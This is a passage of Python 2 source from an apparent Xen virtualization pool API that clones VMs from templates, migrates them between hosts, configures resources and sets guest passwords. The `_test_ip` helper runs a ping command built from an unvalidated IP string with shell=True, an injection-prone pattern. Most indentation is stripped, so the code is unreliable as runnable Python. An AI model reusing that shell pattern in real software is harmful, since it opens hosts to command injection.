log.debug("vm dest: node, vm now: master")
log.debug("host ip (%s) path(%s)" % (host_ip, path))
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, False, False)
if cmp (response.get('Status'), 'Success') == 0:
self._VM_destroy(session, vm_ref, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) != 0:
if cmp(h_ref, host_ref) == 0:
log.debug("-----condition 4-----")
log.debug("vm dest: node1, vm now: node2, node1 = node2")
response = {'Status' : 'Success', 'Value' : vm_ref}
else:
log.debug("-----condition 5-----")
log.debug("vm dest: node1, vm now: node2, node1 != node2")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, False, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct('vm_start_on', vm_ref, h_ref, host_ref) # reason here is pre-fixed
log.debug("Finished change host on: %s migrate vm(%s) to %s" % (h_ip, vm_ref, host_ip))
return response
else:
path = ''
return xen_api_success(True)
except Exception, exn:
log.exception(exn)
return xen_api_error(['CHANGE_HOST_ON_FAILED,', exn])
# finally:
# if path:
# cmd = 'rm -f %s' % path
# doexec(cmd)
'''
    1. clone the VM on the same host as the template
    2. migrate the VM to the destination host
    3. destroy the original VM
'''
def VM_create_on_from_template(self, session, host_ref, vm_ref, newname, config, ping=False):
'''
@author: wuyuewen
@summary: 1. Clone VM from template on the same Host
                    2. Migrate the VM to the destination Host; if migration succeeds, destroy the original VM on the origin Host.
3. Start VM and set VM password, if start VM failed, VM will destroy.
@precondition: 1. Storage has enough space, template structure is legal. See VM_clone_MAC
2. See VM_change_host.
                    3. The destination Host has enough free memory, and the VM has the Agent installed for password change. See VM_set_config.
@param session: session of RPC.
@param host_ref: destinate Host
@param vm_ref: VM's uuid
@param newname: name of new VM
@param config: dict type config
        @param ping: True | False, whether the VM has the Agent installed.
                    True: wait until the VM boots into the OS before returning.
                    False: execute the start operation and return immediately.
@return: True | False
@rtype: dict.
@raise xen_api_error: CHANGE_HOST_ON_FAILED, create vm from template error
'''
# self.__vm_clone_lock__.acquire()
path = None
try:
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
st1 = time.time()
paths = XendNode.instance().get_ha_sr_location()
log.debug(paths)
if not BNPoolAPI.check_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND'])
if not BNPoolAPI.check_host(host_ref):
return xen_api_error(['HOST_NOT_FOUND'])
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
if mac_addr and not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
return xen_api_error(['HA_DIR_NOT_FOUND'])
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, None, newuuid)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, None, newuuid)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
# self.__vm_change_host_lock__.acquire()
# try:
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
# change VM host from cur to host_ref
response = self.VM_change_host(session, domuuid, vm_ref, host_ref, path)
log.debug('change host response: %s' % response)
# finally:
# self.__vm_change_host_lock__.release()
if response.get('Status') == 'Success':
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config, ping) # when set config failed, VM will be deleted!
e2 = (time.time() - st1)
log.debug(">>>>VM_create_on_from_template<<<< Total cost: %s" % e2)
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
except Exception, exn:
log.exception(exn)
return xen_api_error(['create vm from template error: %s' % exn])
finally:
if path:
st1 = time.time()
cmd = 'rm -f %s' % path
doexec(cmd)
e1 = (time.time() - st1)
log.debug('remove %s cost: %s' %(path, e1))
# finally:
# self.__vm_clone_lock__.release()
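    # Hedged usage sketch (config keys as consumed by _VM_set_config below; all
    # refs are pool-wide uuids):
    #   cfg = {'newUuid': new_uuid, 'MAC': '00:16:3e:01:02:03', 'cpuNumber': 2,
    #          'memoryValue': 2048, 'vlanId': '100', 'IOwriteLimit': 100,
    #          'IP': '10.0.0.5', 'passwd': 'new-pass', 'origin_passwd': 'old-pass',
    #          'type': 'linux'}
    #   self.VM_create_on_from_template(session, host_ref, template_ref, 'vm-01', cfg, ping=True)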
def VM_create_from_template(self, session, vm_ref, newname, config):
'''
@deprecated: not used
'''
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
st1 = time.time()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, None, newuuid)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, None, newuuid)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config) # when set config failed, VM will be deleted!
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
def VM_create_with_VDI(self, session, host_ref, vm_ref, newname, config, ping=False):
'''
@deprecated: not used
'''
# self.__vm_clone_lock__.acquire()
path = None
try:
storage = self._get_BNStorageAPI_instance()
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
if not BNPoolAPI.check_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND'])
if not BNPoolAPI.check_host(host_ref):
return xen_api_error(['HOST_NOT_FOUND'])
if not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_new_uuid = config.get('vdiUuid', None)
st1 = time.time()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis and vdi_new_uuid:
vdi_uuid_map[sys_vdi] = vdi_new_uuid
paths = XendNode.instance().get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
return xen_api_error(['HA_DIR_NOT_FOUND'])
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid, True)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid, True)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
# change VM host from cur to host_ref
response = self.VM_change_host(session, domuuid, vm_ref, host_ref, path)
log.debug('change host response: %s' % response)
if response.get('Status') == 'Success':
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config, ping) # when set config failed, VM will be deleted!
e2 = (time.time() - st1)
log.debug(">>>>VM_create_with_VDI<<<< Total cost: %s" % e2)
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
except Exception, exn:
log.exception(exn)
return xen_api_success(False)
# finally:
# self.__vm_clone_lock__.release()
def VM_set_passwd(self, session, vm_ref, vm_ip, passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
        @summary: Set the VM password over SSH. The set-password agent runs on the Host and listens on port 10086.
@precondition: Set password Agent is running, windows VM has SSH-Server installed.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vm_ip: VM's ip
@param passwd: new password
@param origin_passwd: origin password
@param vm_type: windows | linux
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_set_passwd(session, vm_ref, vm_ip, passwd, origin_passwd, vm_type)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_set_passwd", vm_ref, vm_ip, passwd, origin_passwd, vm_type)
return response
else:
response = self._VM_set_passwd(session, vm_ref, vm_ip, passwd, origin_passwd, vm_type)
return response
def _VM_set_passwd(self, session, vm_ref, vm_ip, passwd, origin_passwd, vm_type ):
'''
@author: wuyuewen
        @summary: Internal method. Set the VM password over SSH. The set-password agent runs on the Host and listens on port 10086.
@precondition: Set password Agent is running, windows VM has SSH-Server installed.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vm_ip: VM's ip
@param passwd: new password
@param origin_passwd: origin password
@param vm_type: windows | linux
@return: True | False
@rtype: dict.
'''
#log.debug('vm set passwd(%s) ip(%s) origin(%s) new(%s) vm_type(%s)' % (vm_ref, vm_ip, origin_passwd, passwd, vm_type))
# by henry
log.debug('vm set passwd(%s) ip(%s) origin(%s) new(%s) vm_type(%s)' % (vm_ref, vm_ip, "********", "********", vm_type))
is_on = self._test_ip(vm_ip, 3)
if not is_on:
log.debug('vm(%s) ip(%s) cannot ping, try one more time...' % (vm_ref, vm_ip))
is_on = self._test_ip(vm_ip, 3)
if not is_on:
log.debug('Finally, vm(%s) ip(%s) cannot ping' % (vm_ref, vm_ip))
return xen_api_success(False)
proxy = xmlrpclib.Server("http://127.0.0.1:10086")
flag = proxy.VM_set_passwd(vm_ip, passwd, origin_passwd, vm_type)
return xen_api_success(flag)
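    # The agent on 127.0.0.1:10086 is a plain XML-RPC server expected to expose
    # VM_set_passwd(vm_ip, new_passwd, origin_passwd, vm_type) and return a bool;
    # its implementation (reaching the guest over SSH and running the platform's
    # password-change command) lives outside this file.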
def VM_set_config(self, session, vm_ref, config, ping=False):
'''
@author: wuyuewen
        @summary: Performs several steps:
                    1. set vm vcpu and memory.
                    2. start vm.
                    3. ping vm to check whether it started.
                    4. set password via SSH or a serial device.
        @precondition: Every step has error handling or a rollback path.
                    1. setting vcpu and memory fails: vm is destroyed
                    2. vm cannot start: vm is destroyed
                    3. vm cannot be pinged (got no IP): return an error and keep the vm for inspection
                    4. password cannot be set: return an error and keep the vm for inspection
@param session: session of RPC.
@param vm_ref: VM's uuid
@param config: dict type config
        @param ping: True | False, whether to ping the VM after start.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM set config error, VM start and change password error.
'''
log.debug("Starting VM_set_config...")
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
log.debug('Master node...')
response = self._VM_set_config(session, vm_ref, config, ping)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_set_config", vm_ref, config, ping)
return response
else:
response = self._VM_set_config(session, vm_ref, config, ping)
return response
def _VM_set_config(self, session, vm_ref, config, ping=False):
'''
@author: wuyuewen
        @summary: Internal method. Performs several steps:
                    1. set vm vcpu and memory.
                    2. start vm.
                    3. ping vm to check whether it started.
                    4. set password via SSH or a serial device.
        @precondition: Every step has error handling or a rollback path.
                    1. setting vcpu and memory fails: vm is destroyed
                    2. vm cannot start: vm is destroyed
                    3. vm cannot be pinged (got no IP): return an error and keep the vm for inspection
                    4. password cannot be set: return an error and keep the vm for inspection
@param session: session of RPC.
@param vm_ref: VM's uuid
@param config: dict type config
        @param ping: True | False, whether to ping the VM after start.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM set config error, VM start and change password error.
'''
time_log = {}
log.debug('vm set config')
MB = 1024*1024
vcpu_num = int(config.get('cpuNumber', 1))
memory_value = int(config.get('memoryValue', 1024))*MB
vlanid = config.get('vlanId', '-1')
IO_read_limit = int(config.get('IOreadLimit', 30))
IO_write_limit = int(config.get('IOwriteLimit', 100))
vm_passwd = config.get('passwd', '')
origin_passwd = config.get('origin_passwd', '')
vm_ip = config.get('IP', '')
vm_type = config.get('type', 'linux')
try:
st1 = time.time()
            # 1. set cpu and memory
vcpu_max = self._VM_get_VCPUs_max('', vm_ref).get('Value')
if vcpu_num > vcpu_max:
self._VM_set_VCPUs_number_live('', vm_ref, vcpu_num)
self._VM_set_VCPUs_max(session, vm_ref, vcpu_num)
self._VM_set_VCPUs_at_startup(session, vm_ref, vcpu_num)
elif vcpu_num < vcpu_max:
self._VM_set_VCPUs_max(session, vm_ref, vcpu_num)
self._VM_set_VCPUs_number_live('', vm_ref, vcpu_num)
self._VM_set_VCPUs_at_startup(session, vm_ref, vcpu_num)
memory = int(self._VM_get_memory_static_max(session, vm_ref).get('Value'))
log.debug('memory: %s' % memory)
if memory > memory_value:
#log.debug('memory > memory_value: --> %s > %s' % (memory, memory_value))
self._VM_set_memory_dynamic_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_min(session, vm_ref, 512*MB)
self._VM_set_memory_static_max(session, vm_ref, memory_value)
elif memory < memory_value:
#log.debug('memory < memory_value: --> %s < %s' % (memory, memory_value))
self._VM_set_memory_static_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_min(session, vm_ref, 512*MB)
#2. set vlanid
#self._VM_set_tag_by_ethnum(session, vm_ref, 0, vlanid)
#log.debug('set tag in other config:>>>>>>>>>>>>>>>>')
            dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
            dominfo.info.setdefault('other_config', {})
            dominfo.info['other_config'].setdefault('tag', {})
            dominfo.info['other_config']['tag']['0'] = vlanid
#self._VM_save(dominfo)
#3. set IO limit
self._VM_set_IO_rate_limit(session, vm_ref, 'write', IO_write_limit, 'MBps')
e1 = time.time() - st1
time_log['set config'] = e1
            log.debug('4. finish set vm(%s) vcpu, memory and io rate limit' % vm_ref)
            log.debug('====set vm(%s) vcpu, memory and io rate limit cost time: %s=======' % (vm_ref, e1))
except Exception, exn:
log.error(exn)
self.VM_destroy(session, vm_ref, True)
storage = self._get_BNStorageAPI_instance()
storage.VDI_destroy(session, vm_ref)
return xen_api_error(['VM set config error'])
try:
#5. start vm
# st2 = time.time()
log.debug('5. execute start vm>>>>>>>>>>>>>>>>>>')
start_status = self._VM_start(session, vm_ref, False, True).get('Status')
if start_status == 'Failure':
self._VM_destroy(session, vm_ref, True) # start failed, vm destroy
log.debug('6. vm start failed>>>>>>>>> return')
return xen_api_error('vm(%s) start error' % vm_ref)
is_setPasswd = False
if vm_ip:
if ping:
timeout = 120
deadline = 1
st2 = time.time()
log.debug('6. start to check whether vm load OS>>>>>')
is_on = self._VM_start_checkout(vm_ip, timeout, deadline)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot be pinged within %s seconds' % (vm_ref, str(timeout)))
return xen_api_error('vm(%s) cannot be pinged within %s seconds' % (vm_ref, str(timeout)))
if is_on and vm_passwd and origin_passwd:
set_passwd = threading.Thread(target=self._set_passwd, name='set_passwd',\
kwargs={'session':session, 'vm_ip':vm_ip, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'origin_passwd':origin_passwd, 'vm_type':vm_type})
set_passwd.start()
else:
check_start_and_set_passwd = threading.Thread(target=self._check_start_and_set_passwd, name='check_start_and_set_passwd',\
kwargs={'session':session, 'vm_ip':vm_ip, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'origin_passwd':origin_passwd, 'vm_type':vm_type})
check_start_and_set_passwd.start()
else:
log.debug('Start VM and change passwd using serial.')
if ping:
timeout = 120
st2 = time.time()
log.debug('6. start to check whether vm load OS via serial>>>>>')
is_on = self._VM_start_checkout_via_serial(session, vm_ref, timeout)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot be pinged via serial within %s seconds' % (vm_ref, str(timeout)))
return xen_api_error('vm(%s) cannot be pinged via serial within %s seconds' % (vm_ref, str(timeout)))
if is_on and vm_passwd:
set_passwd = threading.Thread(target=self._set_passwd_via_serial, name='set_passwd_via_serial',\
kwargs={'session':session, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'vm_type':vm_type})
set_passwd.start()
else:
check_start_and_set_passwd = threading.Thread(target=self._check_start_and_set_passwd_via_serial, name='check_start_and_set_passwd_via_serial',\
kwargs={'session':session, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'vm_type':vm_type})
check_start_and_set_passwd.start()
# finally:
# self.__set_passwd_lock__.release()
#6. get record of VM
st4 = time.time()
VM_record = self._VM_get_record(session, vm_ref).get('Value')
if VM_record and isinstance(VM_record, dict):
VM_record['setpasswd'] = is_setPasswd
e4 = time.time() - st4
e5 = time.time() - st1
time_log['get record'] = e4
time_log['total'] = e5
log.debug('return vm record----> %s' % VM_record)
log.debug('8.vm create from template Succeed!>>>>>>>>>>')
log.debug('===vm(%s) set config cost time===' % vm_ref)
# time_log['set config'] = e1
# time_log['load os'] = e2
# time_log['set passwd'] = e3
if time_log.get('set config', ''):
log.debug('set vm vcpu, memory and io rate limit cost time: %s' % e1)
# if time_log.get('load os', ''):
# log.debug('vmstart and load OS cost time: %s' % e2)
# if time_log.get('set passwd'):
# log.debug('vm set passwd cost time: %s' % e3)
if time_log.get('get record'):
log.debug('vm get record cost time: %s' % e4)
if time_log.get('total'):
log.debug('>>>>Total time<<<<: %s' % e5)
log.debug('=====vm(%s) end=====' % (vm_ref))
return xen_api_success(VM_record)
except Exception, exn:
log.error(exn)
if isinstance(exn, VMBadState):
return xen_api_error(['VM start error, bad power state.'])
log.error('9.vm create error....shutdown and remove vm(%s)' % vm_ref)
self._VM_hard_shutdown(session, vm_ref)
self.VM_destroy(session, vm_ref, True)
storage = self._get_BNStorageAPI_instance()
storage.VDI_destroy(session, vm_ref)
return xen_api_error(['VM start and change password error'])
def _check_start_and_set_passwd(self, session, vm_ip, vm_ref, vm_passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
timeout = 120
deadline = 1
st2 = time.time()
log.debug('6. start to check whether vm load OS>>>>>')
is_on = self._VM_start_checkout(vm_ip, timeout, deadline)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot be pinged within %s seconds' % (vm_ref, str(timeout)))
return xen_api_error('vm(%s) cannot be pinged within %s seconds' % (vm_ref, str(timeout)))
#raise Exception, '7. vm(vm_ref) cannot ping in %s s' % (vm_ref, timeout)
if is_on and vm_passwd and origin_passwd:
# self.__set_passwd_lock__.acquire()
# try:
st3 = time.time()
is_setPasswd = self._VM_set_passwd(session, vm_ref, vm_ip, vm_passwd, origin_passwd, vm_type).get('Value', '')
log.debug("7. set passwd result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# time_log['set passwd'] = e3
def _check_start_and_set_passwd_via_serial(self, session, vm_ref, vm_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
timeout = 200
st2 = time.time()
log.debug('6. start to check whether vm load OS via serial>>>>>')
is_on = self._VM_start_checkout_via_serial(session, vm_ref, timeout)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot be pinged via serial within %s seconds' % (vm_ref, str(timeout)))
return xen_api_error('vm(%s) cannot be pinged via serial within %s seconds' % (vm_ref, str(timeout)))
#raise Exception, '7. vm(vm_ref) cannot ping in %s s' % (vm_ref, timeout)
if is_on and vm_passwd:
# self.__set_passwd_lock__.acquire()
# try:
# st3 = time.time()
self._set_passwd_via_serial(session, vm_ref, vm_passwd, vm_type)
# log.debug("7. set passwd via serial result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
# if not is_setPasswd:
# log.debug('vm(%s) set passwd via serial failed!' % vm_ref)
# e3 = time.time() - st3
# log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# time_log['set passwd'] = e3
def _set_passwd(self, session, vm_ip, vm_ref, vm_passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
st3 = time.time()
is_setPasswd = self._VM_set_passwd(session, vm_ref, vm_ip, vm_passwd, origin_passwd, vm_type).get('Value', '')
log.debug("7. set passwd result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# test whether pinging the ip succeeds
def _test_ip(self, ip, deadline = 1):
'''
@author: wuyuewen
@summary: Internal method.
'''
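# Note: on Linux, 'ping -w <deadline>' bounds the whole run to <deadline>
# seconds, and subprocess.call returns the exit status -- 0 means at least
# one reply was received, hence the inverted return value below.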
import os
import subprocess
import datetime
time1 = datetime.datetime.now()
cmd = "ping -w %s %s" % (deadline, ip)
re = subprocess.call(cmd, shell=True)
time2 = datetime.datetime.now()
t = time2 - time1
log.debug('ping %s result: %s, cost time: %s' %(ip, re, str(t)))
if re:
return False
else:
return True
def _set_passwd_via_serial(self, session, vm_ref, vm_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
st3 = time.time()
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
log.exception('VM_get_platform_serial failed!')
return xen_api_success(False)
address = response.get('Value')
log.debug('serial port: %s' % str(address))
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
import json
if cmp(vm_type, 'linux') == 0:
userName = 'root'
else:
userName = 'Administrator'
json_obj = json.dumps({'requestType':'Agent.SetPassword', 'userName':userName, 'password':vm_passwd})
is_setPasswd = Netctl.serial_opt(ip, port, json_obj, False)
log.debug("7. set passwd via serial, result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd via serial failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
def _VM_start_checkout(self, vm_ip, timeout = 60, deadline = 1):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM load os checkout>>>>')
cnt = 0
while cnt < timeout:
if self._test_ip(vm_ip, deadline):
return True
# time.sleep(1)
cnt += 1
log.debug('vm did not start>>>>>')
return False
def _VM_start_checkout_via_serial(self, session, vm_ref, timeout = 60):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM load os checkout>>>>')
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
log.exception('VM_get_platform_serial failed!')
return xen_api_success(False)
address = response.get('Value')
log.debug('serial port: %s' % str(address))
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
import json
json_obj = json.dumps({'requestType':'Agent.Ping'})
log.debug(json_obj)
if self._test_serial(ip, port, json_obj, timeout):
return True
# cnt = 0
# while cnt < timeout:
# if self._test_serial(ip, port, json_obj):
# return True
## time.sleep(1)
# cnt += 1
log.debug('vm did not start>>>>>')
return False
def _test_serial(self, ip, port, json_obj, timeout):
'''
@author: wuyuewen
@summary: Internal method.
'''
import datetime
time1 = datetime.datetime.now()
re = Netctl.serial_opt(ip, port, json_obj, False, timeout, True)
time2 = datetime.datetime.now()
t = time2 - time1
log.debug('ping %s:%s result: %s, cost time: %s' %(ip, port, re, str(t)))
return re
'''
generate template from vm
1. vm_clone
2. set template
return True or False
'''
def VM_create_image(self, session, vm_ref, template_name, template_uuid):
'''
@author: wuyuewen
@summary: Generate template from VM, in several steps:
1. vm_clone
2. set template
@param session: session of RPC.
@param vm_ref: VM's uuid
@param template_name: new template name.
@param template_uuid: template uuid
@return: True | False
@rtype: dict.
'''
log.debug('==========vm(%s) create template==========' % vm_ref)
result = False
try:
response = self.VM_clone(session, vm_ref, template_name, None, template_uuid)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
assert domuuid == template_uuid
log.debug('new VM uuid:%s' % domuuid)
self.VM_set_is_a_template(session, template_uuid, True)
result = True
except Exception, exn:
log.exception(exn)
self.VM_destroy(session, template_uuid, True)
finally:
log.debug('============end===============')
return xen_api_success(result)
def VM_clone(self, session, vm_ref, newname, vdi_uuid_map = None, newuuid = None, vdi_exists = False):
'''
@author: wuyuewen
@summary: Clone a VM, in several steps:
1. get origin VM's VDIs
2. clone VM
3. if VM clone succeeds, clone VDIs
@param session: session of RPC.
@param vm_ref: origin VM's uuid
@param newname: new VM's name
@param vdi_uuid_map: mapping from origin VM's VDI uuids to new clone VDI uuids
@param newuuid: new VM's uuid
@param vdi_exists: True | False, whether the new VDIs already exist (created in advance).
@return: True | False
@rtype: dict.
'''
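# A hedged sketch of the vdi_uuid_map built below (uuids hypothetical):
#   {'<origin-vdi-uuid>': '<new-vdi-uuid>', ...}
# the system VDI, if present, is mapped to the new VM's own uuid.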
log.debug('in VM_clone')
storage = self._get_BNStorageAPI_instance()
if not vdi_uuid_map:
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis:
vdi_uuid_map[sys_vdi] = newuuid
if BNPoolAPI._isMaster:
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
#mapping parent vdi's uuid to new one.
h_ip = BNPoolAPI.get_host_ip(h_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_rpc_call(h_ip, 'VM_clone_local', vm_ref, newname, vdi_uuid_map, newuuid)
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
if cmp(h_ref, XendNode.instance().uuid) == 0:
log.debug("clone from master")
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
log.debug("clone from slave")
response = xen_rpc_call(h_ip, 'VM_clone', vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
log.debug('New domain uuid: %s' % domuuid)
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
# log.debug("return from async")
return response
else:
log.debug('in VM_clone local')
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_clone_local(session, vm_ref, newname, vdi_uuid_map, newuuid)
else:
log.debug('in VM_clone local, else')
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
def VM_clone_local(self, session, vm_ref, newname, vdi_uuid_map=None, newuuid=None):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
if not vdi_uuid_map:
vdi_uuid_map = {}
vdis = vdis_resp.get('Value')
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
log.debug(vdi_uuid_map)
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, XendNode.instance().uuid)
response = storage._VDI_clone(session, vdi_uuid_map, newname, vm_ref)
vdi_uuid = response.get('Value')
if vdi_uuid:
#BNPoolAPI.update_VDI_create(host_ref, sr_ref)
BNPoolAPI.update_data_struct("vdi_create", XendNode.instance().uuid, vdi_uuid)
return xen_api_success(domuuid)
def _VM_clone(self, session, vm_ref, newname, vdi_uuid_map=None, newuuid=None):
log.debug('in _VM_clone')
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100, xendom.domain_clone, vm_ref, newname,\
vdi_uuid_map, newuuid)
return xen_api_success(domuuid)
'''
when cloning a VM, the MAC value needs to be passed
'''
def VM_clone_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map = None, newuuid = None, vdi_exists = False):
'''
@author: wuyuewen
@summary: Clone VM with param MAC.
